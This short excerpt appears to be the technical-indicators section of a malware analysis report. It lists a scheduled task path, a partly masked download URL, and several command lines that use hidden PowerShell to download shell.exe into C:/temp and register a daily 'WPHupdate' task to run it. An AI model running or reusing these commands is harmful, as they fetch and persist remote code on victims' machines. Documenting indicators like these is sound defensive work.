Technical Information
- <SYSTEM32>\tasks\wphupdate
- http://89.##.182.43/shell.exe as c:/temp/shell.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('http://89.##.182.43/shell.exe','C:/temp/she...
- '<SYSTEM32>\cmd.exe' /c powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command SCHTASKS /CREATE /SC DAILY /ST 18:18 /TN 'WPHupdate' /TR 'C:/temp/shell.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command SCHTASKS /CREATE /SC DAILY /ST 18:18 /TN 'WPHupdate' /TR 'C:/temp/shell.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -noprofile -windowstyle hidden -command SCHTASKS /CREATE /SC DAILY /ST 18:18 /TN WPHupdate /TR C:/temp/shell.exe
- '<SYSTEM32>\schtasks.exe' /CREATE /SC DAILY /ST 18:18 /TN WPHupdate /TR C:/temp/shell.exe